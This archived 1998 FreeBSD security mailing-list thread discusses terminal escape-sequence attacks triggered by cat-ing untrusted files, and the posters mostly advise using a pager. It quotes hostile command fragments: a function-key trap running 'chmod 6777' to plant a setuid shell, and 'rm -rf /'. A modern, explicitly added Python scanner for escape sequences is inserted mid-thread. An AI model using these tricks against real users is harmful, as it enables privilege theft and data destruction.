>What would happen if I created a file called README that was binary. Since
>Jay accidentally had the cat'd sendmail.st execute the command "xtermxterm"
>then wouldn't it be possible to create a file (like the README) the people
>would be tricked into catting that would run commands as them?

What happens here is that a specific esc-mumble sequence prompts the
terminal to identify itself, hence the xterm response.

This is a very old exploit, it worked on all async terminals that could
program the function keys by escape sequences. You'd get the key closest
to ESC to send something like:

	chmod 6777 /some/file/I/have/waiting/for/the/victim
	echo -n 'whatever it takes to clear the screen'
	exit 0

and next time the victim almost hit ESC in vi, you had a shell to his
account waiting for you.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
"ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal

From owner-freebsd-security Thu Sep 10 10:58:25 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA17523 for freebsd-security-outgoing; Thu, 10 Sep 1998 10:58:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from phoenix.volant.org (phoenix.volant.org [205.179.79.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA17512 for ; Thu, 10 Sep 1998 10:58:22 -0700 (PDT) (envelope-from patl@phoenix.volant.org)
From: patl@phoenix.volant.org
Received: from asimov.phoenix.volant.org ([205.179.79.65]) by phoenix.volant.org with smtp (Exim 1.92 #8) id 0zHAyo-00041l-00; Thu, 10 Sep 1998 10:58:02 -0700
Received: from localhost by asimov.phoenix.volant.org (SMI-8.6/SMI-SVR4) id KAA25298; Thu, 10 Sep 1998 10:57:59 -0700
Date: Thu, 10 Sep 1998 10:57:59 -0700 (PDT)
Reply-To: patl@phoenix.volant.org
Subject: Re: cat exploit
To: Jay Tribick
cc: security@FreeBSD.ORG
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> That's exactly what I was saying - just for example, say you're installing
> something as root you usually cat the file INSTALL to find out what
> you need to do - it would be relatively simple to embed a command
> in there to just rm -rf / & your hd!

No, I usually 'less', 'more', or even 'emacs' it. For two reasons.

1) INSTALL is usually too large to fit in a single terminal window;
   sometimes too large to fit in the default scrollbuffer.

2) It might contain characters that would make my terminal window do
   something I'd rather it didn't...

Cat should only be used to view files that are known to be small and
clean. (E.g., /etc/motd) If there is -any- doubt at all you should use
more, less, emacs, hd, or some other tool that is more terminal-aware
and will convert 'unprintable' characters.

-Pat

From owner-freebsd-security Thu Sep 10 11:03:07 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA18895 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:03:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gutenberg.uoregon.edu (gutenberg.uoregon.edu [128.223.56.211]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA18888 for ; Thu, 10 Sep 1998 11:03:05 -0700 (PDT) (envelope-from sharding@gutenberg.uoregon.edu)
Received: from localhost (sharding@localhost) by gutenberg.uoregon.edu (8.9.1/8.9.1) with SMTP id LAA00437; Thu, 10 Sep 1998 11:07:03 -0700 (PDT)
Date: Thu, 10 Sep 1998 11:07:03 -0700
From: Sean Harding
Reply-To: Sean Harding
To: Jay Tribick
cc: security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jay Tribick wrote:

> something as root you usually cat the file INSTALL to find out what
> you need to do - it would be relatively simple to embed a command
> in there to just rm -rf / & your hd!

I agree that this is a problem... However, your example is yet another
good reason to do as little as root as possible. You should read all of
the documentation and build the software as a normal user. Only su or
sudo for the 'make install' command...

Sean

--
Sean Harding sharding@oregon.uoregon.edu  |"They burn their bridges as they
http://gladstone.uoregon.edu/~sharding/   | go."
Consulting: http://www.efn.org/~seanh     | --Natalie Merchant

From owner-freebsd-security Thu Sep 10 11:14:55 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA21571 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:14:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA21566 for ; Thu, 10 Sep 1998 11:14:53 -0700 (PDT) (envelope-from Studded@dal.net)
Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id LAA22364; Thu, 10 Sep 1998 11:14:29 -0700 (PDT) (envelope-from Studded@dal.net)
Message-ID: <35F81705.A5B83D3B@dal.net>
Date: Thu, 10 Sep 1998 11:14:29 -0700
From: Studded
Organization: Triborough Bridge & Tunnel Authority
X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0905 i386)
MIME-Version: 1.0
To: Mikael Karpberg
CC: Jay Tribick, freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
References: <199809101618.SAA10499@ocean.campus.luth.se>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mikael Karpberg wrote:
>
> According to Jay Tribick:
> > bofh$ cat sendmail.st
> > `ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm
> > su: xtermxterm: command not found
> > bofh$
> >
> > This seems quite scary to me, couldn't someone embed 'rm -rf /'
> > within a text file and then, if root cats the file it nukes
> > their system?
>
> I'm not completely clear on what that is, but I've seen it also. What I
> _am_ completely clear about is that it's got nothing to do with cat, and
> instead everything to do with xterm.

No no, you've missed an important point here. You shouldn't use cat
routinely to view files, you should use less or more. This will help to
avoid problems like this. By default less won't even open binary files.

Doug

--
*** Chief Operations Officer, DALnet IRC network ***

"Yes, the president should resign. He has lied to the American people,
time and time again, and betrayed their trust. He is no longer an
effective leader. Since he has admitted guilt, there is no reason to put
the American people through an impeachment. He will serve absolutely no
purpose in finishing out his term; the only possible solution is for the
president to save some dignity and resign."
- William Jefferson Clinton, 1974

From owner-freebsd-security Thu Sep 10 11:30:38 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA24659 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:30:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from smtp03.primenet.com (smtp03.primenet.com [206.165.6.133]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA24645; Thu, 10 Sep 1998 11:30:28 -0700 (PDT) (envelope-from tlambert@usr08.primenet.com)
Received: (from daemon@localhost) by smtp03.primenet.com (8.8.8/8.8.8) id LAA29902; Thu, 10 Sep 1998 11:30:18 -0700 (MST)
Received: from usr08.primenet.com(206.165.6.208) via SMTP by smtp03.primenet.com, id smtpd029774; Thu Sep 10 11:30:07 1998
Received: (from tlambert@localhost) by usr08.primenet.com (8.8.5/8.8.5) id LAA27149; Thu, 10 Sep 1998 11:30:03 -0700 (MST)
From: Terry Lambert
Message-Id: <199809101830.LAA27149@usr08.primenet.com>
Subject: Re: FreeBSD Hardening
To: andrew@squiz.co.nz
Date: Thu, 10 Sep 1998 18:30:03 +0000 (GMT)
Cc: enkhyl@hayseed.net, security@FreeBSD.ORG, current@FreeBSD.ORG
In-Reply-To: from "Andrew McNaughton" at Sep 10, 98 03:10:30 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> To get to a point where you can declare a piece of code correct is a
> difficult thing to do, and is prone to getting it wrong. To find
> something that needs fixing generally isn't all that difficult.

Actually, if your code is in vanilla K&R C, or can be preprocessed into
it (using the __P() macro and friends), then there is a tool in the
comp.sources.c++ archives that can perform full branch-path analysis.

This allows you to automatically generate code-coverage tests, which in
turn allows you to build specification/validation tests by covering the
boundary conditions noted in the branch paths.

Taken together, this is most of the way to a "correctness proof".

Now if instead of writing your unit tests in C (or some other language),
you instead write a data interface specification using the TET or ETET
tool sets that are publicly available (and were distributed by UNIX
International), and which have, themselves, been tested for correctness
with tools like "BattleMap", then you can come very close to closure on
the idea of correctness.

To handle the final boundary cases, you need to independently generate
test data from two sources, tsort it, and compare the two for
discrepancies.

This is not impossible, but it is a lot of work. Most probably, you
could get 95% of the way there merely by hand-coding the unit tests
after the analysis, which is 95% better than where things stand today.
See the comp.sources archives on gatekeeper.dec.com for the source code
for the tool.

Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.

From owner-freebsd-security Thu Sep 10 11:36:29 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA26326 for freebsd-security-outgoing; Thu, 10 Sep 1998 11:36:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA26311 for ; Thu, 10 Sep 1998 11:36:25 -0700 (PDT) (envelope-from karl@Jupiter.Mcs.Net)
Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id NAA17517; Thu, 10 Sep 1998 13:36:16 -0500 (CDT)
Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.7/8.8.2) id NAA13435; Thu, 10 Sep 1998 13:36:15 -0500 (CDT)
Message-ID: <19980910133615.A13227@Mcs.Net>
Date: Thu, 10 Sep 1998 13:36:15 -0500
From: Karl Denninger
To: Garrett Wollman, Josef Karthauser
Cc: Jay Tribick, freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
References: <19980910144324.B831@pavilion.net> <199809101510.LAA08830@khavrinen.lcs.mit.edu> <19980910165725.N831@pavilion.net> <199809101622.MAA09014@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu>; from Garrett Wollman on Thu, Sep 10, 1998 at 12:22:09PM -0400
Organization: Karl's Sushi and Packet Smashers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote:
> < said:
>
> >> That's why you should normally use `more' or `less'.
>
> > Ok, but how come the interactions we describe?
>
> Most terminals, including the VT102 emulated by `xterm', include some
> mechanism for generating an ``answerback'' upon receipt of a special
> control code or sequence. (In xterm's case, that happens to be a
> control-E.) A binary file is likely enough to contain such a code.
>
> There might be a preference you can set which will disable this
> feature in xterm, but I don't know what it might be (and if there is
> one, it's not documented).
>
> -GAWollman

Actually, for VTxxx series terminals (and good emulators of them) as well as
most others, the problem is far worse.

Most terminals can be made to display something, set the cursor to where the
"something" is, and then *send the line containing the something to the
host*.

This allows ARBITRARY commands to be accidentally (read: maliciously)
executed by someone doing nothing more than displaying a file!

This is an OLD trick, but one which still works, and if the person doing the
tricking is crafty it can be particularly dangerous.
(Consider that most terminals also have attributes such as "invisible"
text available, and/or that you can send the line, then back up again and
overwrite it).

I can craft a 40-50 byte sequence that will, if the file is "catted" as
root, give me an instant SUID root shell somewhere on the system that
you're very unlikely to find.

Indiscriminately displaying files without terminal control enforced (ie:
by a pager) is EXTREMELY dangerous, especially if you're running with
privileges (ie: as root).

--
Karl Denninger (karl@denninger.net)
Voice: 312-803-6271 x219

From owner-freebsd-security Thu Sep 10 12:09:17 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA01126 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:09:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from alpha.sea-to-sky.net (alpha.sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA01111 for ; Thu, 10 Sep 1998 12:09:13 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net)
Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.9.1a/8.8.7) id MAA21122; Thu, 10 Sep 1998 12:06:20 -0700
Date: Thu, 10 Sep 1998 12:06:20 -0700 (PDT)
From: Steve Reid
To: Jay Tribick
cc: security@FreeBSD.ORG
Subject: Re: cat exploit
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jay Tribick wrote:
> cat the file INSTALL to find out what you need to do - it would be
> relatively simple to embed a command in there to just rm -rf / & your
> hd!

steve@BitBucket:/home/steve% cat /dev/urandom
[barf]
^C
steve@BitBucket:/home/steve% 1;2cxterm1;2cxterm1;2cxterm1;2c1;2cx
term1;2c1;2cxterm1;2c1;2c

I tried it several times and I couldn't get it to produce anything other
than "1;2c" and "xterm", although it did completely freeze my xterm once
(scrollbars didn't even work). It never seemed to embed an enter
character.

I have, on occasion, cat'ed a file and seen the "zsh: command not found:
xtermxtermxterm" but I think that was caused by me typing ahead without
noticing the extra garbage on the command line.

In any case, it looks like the worst that could happen is that a binary
named with some combination of those strings could be executed, IF IT IS
IN YOUR PATH. I can't think of any "evil" command that can be built using
just those strings.
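The thread's practical advice is to put a pager between an untrusted file and the terminal, because the terminal acts on control bytes (Wollman's control-E answerback, Denninger's send-line trick, the "1;2c" device-attribute reply Steve sees above). The following is an added example, not code from the list or from any poster: a small defender's pre-display check in the spirit of `cat -v` that finds control bytes and escape sequences in a byte buffer and renders them visibly instead of passing them to the terminal. The sample input is constructed for the example; the sequence classes (CSI, OSC, two-byte ESC) follow the standard ECMA-48 framing, and the regexes are an assumption of this example rather than anything on the page.

```python
"""Pre-display check for terminal control sequences (added example).

find_control_sequences() reports every byte or sequence a terminal would
interpret rather than print; render_visible() shows a buffer the way
`cat -v` would, with control bytes in caret notation, so nothing in it
can drive the terminal. Neither function is from the list posts.
"""
import re
from typing import List, Tuple

ESC = 0x1B
ENQ = 0x05  # control-E: the answerback trigger mentioned in the thread

# Constructed sample: ordinary text around an ENQ, a CSI device-attributes
# query (ESC [ c) and an OSC window-title sequence (ESC ] 0 ; ... BEL).
SAMPLE = (b"normal text\n"
          b"\x05"
          b"\x1b[c"
          b"\x1b]0;evil\x07"
          b"more text\n")

# ECMA-48 framing, assumed here: CSI = ESC [ params intermediates final;
# OSC = ESC ] ... terminated by BEL or ST (ESC \); plain ESC + one byte.
CSI_RE = re.compile(rb"\x1b\[[0-?]*[ -/]*[@-~]")
OSC_RE = re.compile(rb"\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)")
ESC_RE = re.compile(rb"\x1b[ -/]*[0-~]")


def find_control_sequences(data: bytes) -> List[Tuple[int, str, bytes]]:
    """Return (offset, kind, raw_bytes) for each control byte or sequence.

    TAB and LF are left alone; every other C0 byte, DEL and any ESC-led
    sequence is reported, ENQ under its own label because of answerback.
    """
    found: List[Tuple[int, str, bytes]] = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b == ESC:
            for kind, rx in (("CSI", CSI_RE), ("OSC", OSC_RE), ("ESC", ESC_RE)):
                m = rx.match(data, i)
                if m:
                    found.append((i, kind, m.group(0)))
                    i = m.end()
                    break
            else:  # lone ESC at end of buffer or before an unknown byte
                found.append((i, "ESC", data[i:i + 1]))
                i += 1
        elif b == ENQ:
            found.append((i, "ENQ", b"\x05"))
            i += 1
        elif (b < 0x20 and b not in (0x09, 0x0A)) or b == 0x7F:
            found.append((i, "CTRL", bytes([b])))
            i += 1
        else:
            i += 1
    return found


def is_safe_to_display(data: bytes) -> bool:
    """True when the buffer contains nothing a terminal would act on."""
    return not find_control_sequences(data)


def render_visible(data: bytes) -> str:
    """Render like cat -v: ^X for control bytes, M-x for bytes >= 0x80."""
    out = []
    for b in data:
        if b in (0x09, 0x0A):
            out.append(chr(b))
        elif b < 0x20:
            out.append("^" + chr(b + 0x40))
        elif b == 0x7F:
            out.append("^?")
        elif b < 0x80:
            out.append(chr(b))
        else:
            low = b - 0x80
            if low < 0x20:
                out.append("M-^" + chr(low + 0x40))
            elif low == 0x7F:
                out.append("M-^?")
            else:
                out.append("M-" + chr(low))
    return "".join(out)


if __name__ == "__main__":
    for off, kind, raw in find_control_sequences(SAMPLE):
        print(f"offset {off:3d}  {kind:4s}  {raw!r}")
    print(render_visible(SAMPLE), end="")
```

Run against the constructed SAMPLE the scan reports the ENQ at offset 12, the CSI query at 13 and the OSC sequence at 16, and `render_visible` turns them into `^E`, `^[[c` and `^[]0;evil^G`, which a terminal prints rather than obeys. Wrapping such a check around anything displayed with root privileges gives the same protection the thread attributes to a pager, without relying on the user remembering to avoid cat.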
From owner-freebsd-security Thu Sep 10 12:09:56 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA01209 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:09:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA01197 for ; Thu, 10 Sep 1998 12:09:49 -0700 (PDT) (envelope-from Studded@dal.net)
Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id LAA22396; Thu, 10 Sep 1998 11:22:03 -0700 (PDT) (envelope-from Studded@dal.net)
Message-ID: <35F818CA.8647A116@dal.net>
Date: Thu, 10 Sep 1998 11:22:02 -0700
From: Studded
Organization: Triborough Bridge & Tunnel Authority
X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0905 i386)
MIME-Version: 1.0
To: Michael Richards <026809r@dragon.acadiau.ca>
CC: security@FreeBSD.ORG
Subject: Re: cat exploit
References: <199809101614.NAA07518@dragon.acadiau.ca>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Michael Richards wrote:
>
> Hi.
>
> Is it just me or did everyone miss the point of Jay's message?

It seems to me that a lot of people missed the point of one of the
warnings that someone else posted in response actually. Don't use cat
routinely to view files. Use more, or better yet less since less doesn't
view binary files by default.

Doug

--
*** Chief Operations Officer, DALnet IRC network ***

"Yes, the president should resign. He has lied to the American people,
time and time again, and betrayed their trust. He is no longer an
effective leader. Since he has admitted guilt, there is no reason to put
the American people through an impeachment. He will serve absolutely no
purpose in finishing out his term; the only possible solution is for the
president to save some dignity and resign."
- William Jefferson Clinton, 1974

From owner-freebsd-security Thu Sep 10 12:12:36 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA01725 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:12:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from cain.tasam.com (cain.tasam.com [198.232.144.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA01699 for ; Thu, 10 Sep 1998 12:12:32 -0700 (PDT) (envelope-from cain@cain.tasam.com)
Received: from localhost (cain@localhost) by cain.tasam.com (8.8.8/8.8.8) with SMTP id PAA06630 for ; Thu, 10 Sep 1998 15:11:28 -0500 (EST) (envelope-from cain@cain.tasam.com)
Date: Thu, 10 Sep 1998 15:11:27 -0500 (EST)
From: Cain
To: freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To: <35F7C4A7.12C2A1C7@kew.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The man page is nice... but that doesn't address what the original
message was. More on the original: when I use netterm to get into my box,
and cat a binary, I end up having NETTERM echo to my screen a bunch of
times. But this is most likely to be because your terminal program
interprets some of the binary file to be certain commands. If you cat
sendmail.st to your printer, some will most likely be bold, some will be
underlined maybe.. all sorts of weird stuff will happen. This probably
isn't a problem with cat, but I can't say I'm sure..

On Thu, 10 Sep 1998, Drew Derbyshire wrote:

> Jay Tribick wrote:
> > Was just having a look in /var/log the other day and spotted
> > a file called sendmail.st, wondering what it was I cat'd it
> > and here's what it did:
>
> Quote without comment ...
>
> MAILSTATS(8)            FreeBSD System Manager's Manual           MAILSTATS(8)
>
> NAME
>      mailstats - display mail protocol statistics
>
> SYNOPSIS
>      mailstats [-o] [-C sendmail.cf] [-f sendmail.st]
>
> DESCRIPTION
>      Mailstats displays mail statistics on a per mailer basis. Each line of
>      output contains the mailer number, the count and byte-count of incoming
>      messages, the count and byte-count of outgoing messages, and the name of
>      the mailer unless the -o flag is specified. Common mailers include smtp
>      and local (eg: mail.local, the program which handles local delivery of
>      mail).
>
>      Statistics are read from the sendmail statistics file sendmail.st, the
>      location of which is defined in sendmail.cf, or specified with the -f
>      flag. Mailers are likewise defined in the sendmail.cf file. Statistics
>      are cumulative; zero the statistics file to reset the counters.
>
> FILES
>      /etc/sendmail.cf        sendmail configuration file
>      /var/log/sendmail.st    sendmail statistics file
>
> SEE ALSO
>      mail.local(8), sendmail(8)
>
> BSD                            August 13, 1996                               1
>
> --
> Drew Derbyshire                UUPC/extended e-mail: software@kew.com
> Telephone: 617-279-9812
>
> "For every bug fixed, there is a bigger bug not yet discovered."

From owner-freebsd-security Thu Sep 10 12:18:36 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA02935 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:18:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from cain.tasam.com (cain.tasam.com [198.232.144.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA02917 for ; Thu, 10 Sep 1998 12:18:32 -0700 (PDT) (envelope-from cain@cain.tasam.com)
Received: from localhost (cain@localhost) by cain.tasam.com (8.8.8/8.8.8) with SMTP id PAA06638 for ; Thu, 10 Sep 1998 15:17:30 -0500 (EST) (envelope-from cain@cain.tasam.com)
Date: Thu, 10 Sep 1998 15:17:30 -0500 (EST)
From: Cain
To: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Hardening
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I was going to attempt to contribute until school started back up
suddenly, but I can host a mailing list off of my server in an attempt to
contribute something... I have found a few problems and have patches for
them, but I was waiting to find a few more as they aren't very high risk
to post them anywhere..

On Thu, 10 Sep 1998, andrewr wrote:

>
>
> On Wed, 9 Sep 1998, Enkhyl wrote:
>
> > Back when the popper buffer overflow bug sprang forth it was suggested
> > that it might be a good idea to go through the OpenBSD change logs and
> > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone
> > actively working on this? If there is a project organized around this, I'm
> > willing to help out with the endeavor. Otherwise, I'm willing to embark on
> > this endeavor and make a project out of it.
>
> This kind of died due to lack of interest. As I was told by jkh, if one
> is interested enough in this, just start up a mailing list (not from
> FreeBSD.org) and a team of workers and get to it. Soon, if all goes well,
> it would be incorporated into the actual project. Good luck.
>
> Andrew
>
> >
> > Comments?
> >
> > --
> > Christopher Nielsen
> > Scient: The Art and Science of Electronic Business
> > cnielsen@scient.com

From owner-freebsd-security Thu Sep 10 12:38:04 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA07150 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:38:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA07045 for ; Thu, 10 Sep 1998 12:37:49 -0700 (PDT) (envelope-from mark@grondar.za)
Received: from grondar.za (IDENT:SSiK1qtMBNulkbU3NYkIpzKH0dKpkC0y@localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id VAA20286; Thu, 10 Sep 1998 21:37:00 +0200 (SAST) (envelope-from mark@grondar.za)
Message-Id: <199809101937.VAA20286@gratis.grondar.za>
To: ben@rosengart.com
cc: Jay Tribick, security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: Your message of " Thu, 10 Sep 1998 13:44:03 -0400."
Date: Thu, 10 Sep 1998 21:36:56 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Snob Art Genre wrote:
> 1) No, you use less.

... or view(1) or more(1) or.... NOT cat(1).

> 2) So you've figured out how to execute arbitrary commands from this?
> I'm not saying that's not possible, but so far the only thing this
> "bug" does is output the name of xterm.

Most modern terminals (and emulators) can be programmed to do weird
things. Weird things such as "when your user types key , send sequence "
for various definitions of and . This used to be an attack at
universities-with-mainframes when students actually read manuals.

Login: me
Password:
$
Message from badguy: 'elgj' qerjgp'adl'glkJSFL'Kdfjmf'sd;lkf;sdf
$ logout                                (response to "w" from user).

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Thu Sep 10 12:41:13 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08048 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:41:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from aniwa.sky (pppk-12.igrin.co.nz [202.49.245.91]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA08012 for ; Thu, 10 Sep 1998 12:40:57 -0700 (PDT) (envelope-from andrew@squiz.co.nz)
Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id HAA05173; Fri, 11 Sep 1998 07:40:00 +1200 (NZST) (envelope-from andrew@squiz.co.nz)
Date: Fri, 11 Sep 1998 07:39:59 +1200 (NZST)
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: Jay Tribick
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jay Tribick wrote:

> | >Was just having a look in /var/log the other day and spotted
> | >a file called sendmail.st, wondering what it was I cat'd it
> | >and here's what it did:
> | >
> | >bofh$ cat sendmail.st
> | >`ay5habf33*`ma}`)`Jj]: Jsu-2.01$ xtermxterm
> | >su: xtermxterm: command not found
> | >bofh$
> | >
> | >This seems quite scary to me, couldn't someone embed 'rm -rf /'
> | >within a text file and then, if root cats the file it nukes
> | >their system?
> | It is a binary file.
> | Terminals don't like it when you cat a binary.
>
> It's not the fact that it was a binary that puzzled me but that
> it had managed to execute a command on the shell just by me
> cat'ing the file. Forgot to mention that it was in an xterm
> and doesn't affect Virtual Consoles.

This is the key point. If you could get something executed merely by
having it passed to a terminal then all sorts of exploits presumably
become possible.

I haven't gone through the binary you sent, and I don't know very much
about xterm escape sequences and so forth, but scanning through the man
page for xterm, the 'string' action stands out as potentially highly
dangerous unless care has been taken to limit its impact.

I tried cat'ing a couple of binaries and sure enough I got heaps of
'command not found' errors. All of them are full of 'xtermxterm' type
stuff which leads me to believe that dangerous text gets this substituted
into what goes to the shell. Probably this means it's mostly safe.

If an attacker can get an executable file into the path with a name like
'2cxterm1' then they can use this mechanism to get it executed.
There might be an occasion where this was useful, but mostly an account
is not much more secure than its path anyway.

Andrew McNaughton

From owner-freebsd-security Thu Sep 10 12:51:58 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA09521 for freebsd-security-outgoing; Thu, 10 Sep 1998 12:51:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from hwhlap.hjns.net (hwhlap.hjns.net [207.213.153.54]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA09506 for ; Thu, 10 Sep 1998 12:51:47 -0700 (PDT) (envelope-from hwh@hwhlap.hjns.net)
Received: from hwhlap.hjns.net (localhost [127.0.0.1]) by hwhlap.hjns.net (8.8.8/8.8.8) with ESMTP id MAA03493 for ; Thu, 10 Sep 1998 12:51:38 -0700 (PDT) (envelope-from hwh@hwhlap.hjns.net)
Message-Id: <199809101951.MAA03493@hwhlap.hjns.net>
To: security@FreeBSD.ORG
Subject: Re: cat exploit
Date: Thu, 10 Sep 1998 12:51:37 -0700
From: Harold Hankins
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jay Tribick wrote:
>> That's exactly what I was saying - just for example, say you're installing
>> something as root you usually cat the file INSTALL to find out what
>> you need to do - it would be relatively simple to embed a command
>> in there to just rm -rf / & your hd!

One of the first rules of unix admin is NEVER cat a file to your terminal.
This is an old security hole, I thought everyone knew about it. Maybe it's
been too long since it was exploited and it's been forgotten.

A little background for newcomers to unix administration:

Most terminals had escape sequences not only to answerback but also to send
all or part of the screen contents back to the host. This was used to allow
us to write "forms" on the screen, let the user fill it in, and then let
